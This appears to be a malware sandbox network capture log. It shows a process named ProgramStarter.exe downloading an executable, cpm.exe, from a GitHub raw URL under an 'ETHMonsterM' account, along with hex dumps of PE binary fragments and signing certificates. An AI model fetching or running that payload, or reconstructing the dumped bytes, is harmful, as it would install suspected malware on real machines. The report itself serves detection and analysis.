                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC12INData Raw: 40 9c 74 73 3d 8c 20 40 9c 74 4f 3d 90 20 40 9c 74 42 3d c4 60 40 9c 74 0e 41 3b c3 74 09 41 3b c2 0f 85 70 02 00 00 41 3b c3 48 8b 4e 18 44 8b 42 10 8b 11 0f 84 a2 00 00 00 41 3b c2 0f 84 92 00 00 00 41 3b c1 0f 85 55 01 00 00 ed 89 01 e9 8b 00 00 00 f4 e9 3b 02 00 00 48 8b 4e 18 44 8b 4a 08 8b 52 10 4c 8b c1 48 89 7c 24 20 e8 fc 02 00 00 e9 f3 01 00 00 48 8b 4e 18 44 8b 4a 08 8b 52 10 4c 8b c1 48 89 7c 24 20 e8 ab 02 00 00 e9 d6 01 00 00 48 8b 4e 18 44 8b 4a 08 8b 52 10 4c 8b c1 48 89 7c 24 20 e8 5a 02 00 00 e9 b9 01 00 00 48 8b 4e 18 8b 05 f3 1e 00 00 89 01 48 c7 07 04 00 00 00 e9 cc 01 00 00 48 8b 46 18 c7 00 05 00 02 01 eb e8 66 ed 66 89 01 eb 03 ec 88 01 44 89 07 e9 ae 01 00 00 3d 04 61 40 9c 0f 84 60 01 00 00 3d 44 61 40 9c 0f 84 e3 00 00 00 3d c8
                                                                                                                                                                                                                    Data Ascii: @ts= @tO= @tB=`@tA;tA;pA;HNDBA;A;U;HNDJRLH|$ HNDJRLH|$ HNDJRLH|$ ZHNHHFffD=a@`=Da@=
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC13INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC14INData Raw: 00 00 93 14 00 00 24 21 00 00 9c 14 00 00 c8 14 00 00 08 21 00 00 d0 14 00 00 fb 14 00 00 ec 20 00 00 04 15 00 00 e1 15 00 00 48 21 00 00 28 16 00 00 4f 16 00 00 e4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: $!! H!(O
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC16INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 00 00 00 18 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 30 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 48 00 00 00 60 60 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 03 34 00 00 00 56 00 53 00 5f 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e 00 5f 00 49 00 4e 00 46 00 4f 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: 0H``\\4VS_VERSION_INFO
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC17INData Raw: 20 6e 76 2d 73 61 31 16 30 14 06 03 55 04 0b 13 0d 4f 62 6a 65 63 74 53 69 67 6e 20 43 41 31 21 30 1f 06 03 55 04 03 13 18 47 6c 6f 62 61 6c 53 69 67 6e 20 4f 62 6a 65 63 74 53 69 67 6e 20 43 41 30 1e 17 0d 30 37 30 39 32 34 31 30 35 30 35 35 5a 17 0d 30 38 30 39 32 34 31 30 35 30 35 35 5a 30 53 31 0b 30 09 06 03 55 04 06 13 02 4a 50 31 1a 30 18 06 03 55 04 03 13 11 4e 6f 72 69 79 75 6b 69 20 4d 49 59 41 5a 41 4b 49 31 28 30 26 06 09 2a 86 48 86 f7 0d 01 09 01 16 19 68 69 79 6f 68 69 79 6f 40 63 72 79 73 74 61 6c 6d 61 72 6b 2e 69 6e 66 6f 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 c6 bc d9 18 cf 65 d1 87 3c 8a fc 9a 09 42 b9 68 c9 f0 bd 68 07 b0 70 61 1d 73 df ac dd f6 be dc 36 12 7e 5c 60 79 be 65
                                                                                                                                                                                                                    Data Ascii: nv-sa10UObjectSign CA1!0UGlobalSign ObjectSign CA0070924105055Z080924105055Z0S10UJP10UNoriyuki MIYAZAKI1(0&*Hhiyohiyo@crystalmark.info0"0*H0e<Bhhpas6~\`ye
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC18INData Raw: 42 94 95 d3 1a 6e 31 55 47 d7 eb ad c7 4c 9f 54 71 83 1a 17 c8 f9 e7 ce 58 01 f4 36 bf ae 3f 59 9f 65 7c 40 07 5c 73 20 34 a2 12 c3 49 f4 68 40 69 1e 89 e0 85 e9 3a b7 97 63 bb 47 b0 39 6b 41 00 7e f5 4b b8 7f e3 21 02 03 01 00 01 a3 81 99 30 81 96 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 06 30 0f 06 03 55 1d 13 01 01 ff 04 05 30 03 01 01 ff 30 1d 06 03 55 1d 0e 04 16 04 14 56 84 ec b5 71 a5 e7 63 d8 db 51 04 d6 fa e6 f0 48 52 49 ce 30 33 06 03 55 1d 1f 04 2c 30 2a 30 28 a0 26 a0 24 86 22 68 74 74 70 3a 2f 2f 63 72 6c 2e 67 6c 6f 62 61 6c 73 69 67 6e 2e 6e 65 74 2f 52 6f 6f 74 2e 63 72 6c 30 1f 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 5c 2f
                                                                                                                                                                                                                    Data Ascii: Bn1UGLTqX6?Ye|@\s 4Ih@i:cG9kA~K!00U0U00UVqcQHRI03U,0*0(&$"http://crl.globalsign.net/Root.crl0U#0`{fEP/}4K0*H\/
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC20INData Raw: 02 32 69 c7 05 42 94 d0 bb e3 bb a9 08 c3 93 50 1b db 84 6d c0 ba 1e 52 98 65 9c 13 76 bd b3 d5 67 29 2f 1f 7b aa 2c 51 a0 fd 85 4f 26 3c 48 a3 81 27 a6 fe ee 7f 78 99 c2 45 cf 9d 1f 52 7e d7 95 8b fd e1 d0 20 c3 af 7e 51 a2 2f 66 3b ab 2d cf 2d 8e 8c 4d 7d 18 39 21 28 fb dc ae 6d 65 81 d0 e0 d7 18 4b e7 b5 f7 74 d7 84 e6 52 2a ac 3b 68 fd 3b 4a b8 01 54 84 91 32 bb 95 d2 8e 63 30 a6 9e ce 23 96 fe ab 2e b8 6a 8b 74 dc de 21 a1 14 c2 fb bf 53 af 10 30 82 04 0f 30 82 02 f7 a0 03 02 01 02 02 0b 04 00 00 00 00 01 10 92 eb 82 95 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 71 31 28 30 26 06 03 55 04 03 13 1f 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 53 69 67 6e 20 50 61 72 74 6e 65 72 73 20 43 41 31 1d 30 1b 06 03 55 04 0b 13 14 52 6f 6f 74 53 69 67 6e
                                                                                                                                                                                                                    Data Ascii: 2iBPmRevg)/{,QO&<H'xER~ ~Q/f;--M}9!(meKtR*;h;JT2c0#.jt!S000*H0q1(0&UGlobalSign RootSign Partners CA10URootSign
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC21INData Raw: 39 30 30 30 30 5a 17 0d 31 34 30 31 32 37 31 30 30 30 30 30 5a 30 63 31 0b 30 09 06 03 55 04 06 13 02 42 45 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 16 30 14 06 03 55 04 0b 13 0d 4f 62 6a 65 63 74 53 69 67 6e 20 43 41 31 21 30 1f 06 03 55 04 03 13 18 47 6c 6f 62 61 6c 53 69 67 6e 20 4f 62 6a 65 63 74 53 69 67 6e 20 43 41 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 b0 b1 f2 80 00 70 ce ec c3 8c b4 97 ed c6 09 8c 26 6f 89 df 67 59 81 cf de 14 13 4c c2 b1 45 e2 53 75 41 fa 07 36 6f ba 11 70 28 94 7c 6d 72 bd 07 15 25 65 3a 09 ff 85 dc fa 7b 5e 37 87 38 e4 c7 4b 08 80 98 9e 8a cd 58 09 02 c0 c3 01 49 96 58 88 89 26 59 f5 6d c6 b9 c1 fb 18 25 ed d8 62 4e ca 0a 6c
                                                                                                                                                                                                                    Data Ascii: 90000Z140127100000Z0c10UBE10UGlobalSign nv-sa10UObjectSign CA1!0UGlobalSign ObjectSign CA0"0*H0p&ogYLESuA6op(|mr%e:{^78KXIX&Ym%bNl
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC22INData Raw: bc 1e 34 b5 8b 05 8c b9 77 8b b1 db 1f 20 91 ab 09 53 6e 90 ce 7b 37 74 b9 70 47 91 22 51 63 16 79 ae b1 ae 41 26 08 c8 19 2b d1 46 aa 48 d6 64 2a d7 83 34 ff 2c 2a c1 6c 19 43 4a 07 85 e7 d3 7c f6 21 68 ef ea f2 52 9f 7f 93 90 cf 02 03 01 00 01 a3 82 01 23 30 82 01 1f 30 11 06 03 55 1d 20 04 0a 30 08 30 06 06 04 55 1d 20 00 30 36 06 09 2b 06 01 04 01 82 37 15 07 04 29 30 27 06 1f 2b 06 01 04 01 82 37 15 08 8d e0 d1 89 4e 84 d7 9c c3 07 86 a6 86 fb 1c 8f d3 bf a6 15 01 19 02 01 6e 02 01 00 30 0b 06 03 55 1d 0f 04 04 03 02 01 86 30 0f 06 03 55 1d 13 01 01 ff 04 05 30 03 01 01 ff 30 1d 06 03 55 1d 0e 04 16 04 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 1d 06 09 2b 06 01 04 01 82 37 14 02 04 10 1e 0e 00 43 00 72 00 6f 00 73 00 73 00 43
                                                                                                                                                                                                                    Data Ascii: 4w Sn{7tpG"QcyA&+FHd*4,*lCJ|!hR#00U 00U 06+7)0'+7Nn0U0U00U`{fEP/}4K0+7CrossC
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC24INData Raw: 08 50 2b 0c 4f 14 ea 82 71 b7 ba 4b fe 02 47 37 b0 31 c5 7c b9 df c9 31 3a 43 45 24 a1 82 02 d5 30 82 02 d1 06 09 2a 86 48 86 f7 0d 01 09 06 31 82 02 c2 30 82 02 be 02 01 01 30 81 80 30 71 31 28 30 26 06 03 55 04 03 13 1f 47 6c 6f 62 61 6c 53 69 67 6e 20 52 6f 6f 74 53 69 67 6e 20 50 61 72 74 6e 65 72 73 20 43 41 31 1d 30 1b 06 03 55 04 0b 13 14 52 6f 6f 74 53 69 67 6e 20 50 61 72 74 6e 65 72 73 20 43 41 31 19 30 17 06 03 55 04 0a 13 10 47 6c 6f 62 61 6c 53 69 67 6e 20 6e 76 2d 73 61 31 0b 30 09 06 03 55 04 06 13 02 42 45 02 0b 04 00 00 00 00 01 10 92 eb 82 95 30 09 06 05 2b 0e 03 02 1a 05 00 a0 82 01 16 30 18 06 09 2a 86 48 86 f7 0d 01 09 03 31 0b 06 09 2a 86 48 86 f7 0d 01 07 01 30 1c 06 09 2a 86 48 86 f7 0d 01 09 05 31 0f 17 0d 30 38 30 37 32 36 31 33
                                                                                                                                                                                                                    Data Ascii: P+OqKG71|1:CE$0*H1000q1(0&UGlobalSign RootSign Partners CA10URootSign Partners CA10UGlobalSign nv-sa10UBE0+0*H1*H0*H108072613


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    6192.168.2.349691185.199.111.133443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC9OUTGET /ETHMonsterM/ETHMonsterM/main/cpm.exe HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC25INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Length: 8294400
                                                                                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    ETag: "d5b77ea67a26d9602530359f5621c38dbbec9c335d054130363ae6a075f8dbc0"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    X-GitHub-Request-Id: BDA4:FBE3:266A5C6:281D69F:64164682
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:22 GMT
                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                    X-Served-By: cache-mxp6947-MXP
                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                    X-Timer: S1679181442.043789,VS0,VE523
                                                                                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    X-Fastly-Request-ID: 4b09bdf2ec36e8d042a4d310bebe7ba1adf74a57
                                                                                                                                                                                                                    Expires: Sat, 18 Mar 2023 23:22:22 GMT
                                                                                                                                                                                                                    Source-Age: 0
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC25INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 8d 5a 4c 62 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 a0 5f 00 00 80 7e 00 00 00 00 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 b0 00 00 10 00 00 46 39 7f 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdZLb.&_~@F9`
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC27INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC28INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC29INData Raw: 46 2c 75 00 c7 00 01 00 00 00 48 8b 05 49 2c 75 00 c7 00 01 00 00 00 48 8b 05 ac 2b 75 00 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 66 48 8b 05 ef 2b 75 00 89 0d b9 bf 7d 00 8b 00 85 c0 74 43 b9 02 00 00 00 e8 01 5d 43 00 e8 34 52 43 00 48 8b 15 ad 2d 75 00 8b 12 89 10 e8 34 52 43 00 48 8b 15 7d 2d 75 00 8b 12 89 10 e8 44 58 42 00 48 8b 05 fd 12 75 00 83 38 01 74 50 31 c0 48 83 c4 28 c3 90 b9 01 00 00 00 e8 be 5c 43 00 eb bb 0f 1f 40 00 0f b7 50 18 66 81 fa 0b 01 74 45 66 81 fa 0b 02 75 88 83 b8 84 00 00 00 0e 0f 86 7b ff ff ff 8b 90 f8 00 00 00 31 c9 85 d2 0f 95 c1 e9 69 ff ff ff 0f 1f 80 00 00 00 00 48 8b 0d 51 2d 75 00 e8 3c 5f 42 00 31 c0 48 83 c4 28 c3 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85
                                                                                                                                                                                                                    Data Ascii: F,uHI,uH+uf8MZuHcP<H8PEtfH+u}tC]C4RCH-u4RCH}-uDXBHu8tP1H(\C@PftEfu{1iHQ-u<_B1H(Dxt@D1E
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC31INData Raw: 4e 18 4c 89 63 20 41 89 c0 31 c0 44 88 c0 8a 66 0c 66 0f 62 c1 66 0f d6 43 0c 66 89 43 0a 49 8b 45 00 48 89 43 18 48 8b 84 24 88 00 00 00 48 89 43 28 8b 07 3d 00 00 15 6c 0f 84 c1 00 00 00 25 00 00 00 ff 31 d2 b9 01 00 00 00 3d 00 00 00 63 0f 94 c2 8d 14 95 01 00 00 00 41 8b 45 08 41 b8 01 00 00 00 48 8b 75 08 66 0f ef c0 85 c0 41 0f 44 c0 39 d0 0f 47 c2 39 c8 0f 42 c1 48 2b 75 00 48 c7 43 48 00 00 00 00 0f 11 43 38 89 43 30 74 67 48 b8 f8 ff ff ff ff ff ff 7f 48 39 c6 77 78 48 89 f1 e8 90 38 5f 00 48 89 c1 66 48 0f 6e c1 48 01 ce 66 0f 6c c0 48 89 73 48 0f 11 43 38 48 8b 45 08 48 8b 55 00 48 89 c6 48 29 d6 48 39 d0 74 0b 49 89 f0 e8 de 59 43 00 48 89 c1 48 01 f1 48 89 4b 40 48 83 c4 28 5b 5e 5f 5d 41 5c 41 5d c3 0f 1f 80 00 00 00 00 31 c9 eb af 0f 1f 40
                                                                                                                                                                                                                    Data Ascii: NLc A1DffbfCfCIEHCH$HC(=l%1=cAEAHufAD9G9BH+uHCHC8C0tgHH9wxH8_HfHnHflHsHC8HEHUHH)H9tIYCHHHK@H([^_]A\A]1@
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC32INData Raw: c0 e8 60 e8 5b 00 48 89 06 48 89 c1 48 8b 44 24 28 48 89 46 10 49 89 d8 4c 89 e2 e8 2e 55 43 00 48 8b 5c 24 28 48 8b 0e eb ad 48 8d 0d 15 a5 60 00 e8 d0 83 5f 00 90 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 57 56 53 48 83 ec 30 4c 89 c7 89 d6 48 89 cb b9 02 00 00 00 ff 15 86 51 60 00 48 89 7c 24 20 41 89 f1 49 89 d8 48 89 c1 48 8d 15 b1 a4 60 00 e8 bc fd ff ff e8 07 d3 5e 00 90 66 0f 1f 44 00 00 57 56 53 48 81 ec 50 02 00 00 48 8d 35 1f 92 75 00 66 48 0f 6e c6 4d 8b 10 4d 8b 58 08 48 8d 5c 24 50 4c 89 54 24 20 49 89 c9 4c 8d 44 24 20 66 48 0f 6e cb 4c 89 5c 24 28 48 8d 4c 24 30 66 0f 6c c1 0f 11 44 24 30 f3 0f 6f 05 11 af 60 00 0f 11 44 24 40 41 ff d1 48 8b 3d 02 51 60 00 b9 02 00 00 00 ff d7 48 8b 54 24 40 48 8b 4c 24 38 41 b8 01 00 00 00 49 89 c1 e8
                                                                                                                                                                                                                    Data Ascii: `[HHHD$(HFIL.UCH\$(HH`_ff.@WVSH0LHQ`H|$ AIHH`^fDWVSHPH5ufHnMMXH\$PLT$ ILD$ fHnL\$(HL$0flD$0o`D$@AH=Q`HT$@HL$8AI
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC33INData Raw: 00 0f 86 41 01 00 00 81 eb 00 00 01 00 48 8b 4e 18 41 89 de 41 c1 ee 0a 66 41 81 ee 00 28 49 39 c8 76 17 4c 89 c2 48 89 f1 e8 c6 64 44 00 48 8b 56 10 48 8b 4e 18 4c 8d 42 01 48 8b 46 08 4c 89 46 10 66 81 e3 ff 03 66 81 eb 00 24 66 44 89 34 50 48 83 c2 02 48 39 ca 76 14 48 89 f1 e8 92 64 44 00 4c 8b 46 10 48 8b 46 08 49 8d 50 01 48 89 56 10 48 89 fa 4c 29 fa 66 42 89 1c 40 48 39 ea 0f 8d fd 00 00 00 0f b6 0f 48 89 fa 4c 8b 74 24 38 44 0f b6 4a 01 89 c8 c0 e8 03 44 89 cb 83 e0 1f 49 0f be 44 05 00 3c 01 49 89 c0 48 11 c7 0f b6 42 02 c1 e3 0c 0f b6 52 03 81 e3 00 f0 03 00 43 23 0c 86 41 89 c2 c1 e1 12 41 c1 e2 06 41 81 e2 c0 0f 00 00 44 09 d3 41 89 d2 41 83 e2 3f 44 09 d3 45 31 d2 09 cb 43 8b 0c 84 d3 eb 48 8b 4c 24 28 42 3b 1c 81 48 8b 4c 24 30 41 0f 92 c2
                                                                                                                                                                                                                    Data Ascii: AHNAAfA(I9vLHdDHVHNLBHFLFff$fD4PHH9vHdDLFHFIPHVHL)fB@H9HLt$8DJDID<IHBRC#AAADAA?DE1CHL$(B;HL$0A
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC35INData Raw: 24 66 41 0f 6e c9 47 8d 14 01 48 c1 e9 20 41 89 c3 66 0f 62 c1 48 89 54 24 40 41 8d 42 ff 66 0f d6 44 24 48 41 83 e3 01 80 f9 01 74 11 84 c9 0f 85 31 01 00 00 83 f8 fc 0f 8d 14 01 00 00 44 89 f2 4d 63 c8 44 29 c2 41 83 f8 01 7f 08 4c 89 c9 45 84 db 74 18 49 8d 49 01 85 d2 7e 10 45 84 db 74 0b 83 ea 01 48 63 d2 49 8d 4c 11 02 41 b8 01 00 00 00 48 8d 51 02 45 29 d0 85 c0 41 0f 48 c0 83 f8 63 7e 11 48 83 c1 03 3d e7 03 00 00 48 0f 4f d1 48 83 c2 01 48 83 c2 02 8b 06 41 80 fd 01 48 8d 0d 6b 26 75 00 48 83 da ff 48 89 c3 48 29 d3 48 39 c2 b8 00 00 00 00 48 0f 43 d8 0f b6 46 0c 49 03 54 24 10 83 e0 0f 48 89 df 0f be 0c 01 0f b6 46 15 48 0f af c3 48 d3 ef 48 01 c2 49 3b 54 24 18 76 09 49 8b 04 24 4c 89 e1 ff 10 48 83 c6 11 4c 89 e1 48 89 fa 49 89 f0 e8 e2 f8 44
                                                                                                                                                                                                                    Data Ascii: $fAnGH AfbHT$@ABfD$HAt1DMcD)ALEtII~EtHcILAHQE)AHc~H=HOHHAHk&uHHH)H9HCFIT$HFHHHI;T$vI$LHLHID
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC36INData Raw: 00 00 48 89 9c 24 d8 00 00 00 48 83 fb 0f 0f 87 23 0a 00 00 48 83 fb 01 0f 85 f4 09 00 00 41 0f b6 45 00 41 88 44 24 10 49 89 5c 24 08 c6 04 19 00 48 8b 8c 24 68 03 00 00 48 89 b4 24 60 03 00 00 48 39 f9 0f 85 0d fe ff ff e9 0d fe ff ff 90 49 8d 7c 24 10 48 8b 9c 24 00 01 00 00 41 c6 44 24 10 00 31 d2 49 89 3c 24 49 c7 44 24 08 00 00 00 00 48 89 d8 0f 1f 00 83 c2 01 48 c1 e8 04 75 f7 48 63 f2 45 31 c0 4c 89 e1 48 8d 56 02 e8 fd ca 5b 00 49 8b 04 24 ba 30 78 00 00 48 8d 0d ad 5f 60 00 66 89 10 48 8d 44 30 02 0f 1f 44 00 00 48 89 da 48 83 e8 01 83 e2 0f 48 c1 eb 04 0f b6 14 11 88 10 75 ea e9 91 fd ff ff 0f 1f 44 00 00 49 8d 74 24 10 41 c6 44 24 10 00 45 31 c0 4c 89 e1 48 8b 9c 24 08 01 00 00 49 89 34 24 49 c7 44 24 08 00 00 00 00 4c 8b ac 24 00 01 00 00 48
                                                                                                                                                                                                                    Data Ascii: H$H#HAEAD$I\$H$hH$`H9I|$H$AD$1I<$ID$HHuHcE1LHV[I$0xH_`fHD0DHHHuDIt$AD$E1LH$I4$ID$L$H
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC37INData Raw: f0 48 19 d8 0f 83 20 05 00 00 48 89 8c 24 a0 00 00 00 48 89 cd 48 89 d3 4c 89 e1 48 89 94 24 a8 00 00 00 4c 89 ea 41 83 c7 04 48 c7 84 24 90 00 00 00 10 27 00 00 48 c7 84 24 98 00 00 00 00 00 00 00 e8 67 48 42 00 b8 9f 86 01 00 48 39 e8 4c 89 f0 0f 11 44 24 20 48 8b 4c 24 20 48 19 d8 48 8b 54 24 28 0f 82 64 ff ff ff 49 89 fc 48 8b 74 24 30 48 8b 7c 24 38 49 63 df 45 31 c0 4c 89 e1 48 89 da e8 a6 c5 5b 00 b8 63 00 00 00 49 03 1c 24 48 39 f0 b8 00 00 00 00 48 89 d9 48 19 f8 0f 83 0e 01 00 00 4c 8d 0d 22 67 60 00 45 31 db 49 bd c2 f5 28 5c 8f c2 f5 28 4c 89 a4 24 d0 05 00 00 4c 89 6c 24 30 41 be 19 00 00 00 49 ba ff ff ff ff ff ff ff 0f 48 bb 15 ae 47 e1 7a 14 ae 47 49 b8 29 5c 8f c2 f5 28 5c 8f 0f 1f 40 00 48 89 f0 48 89 f5 48 83 e9 02 45 31 ed 48 0f ac f8
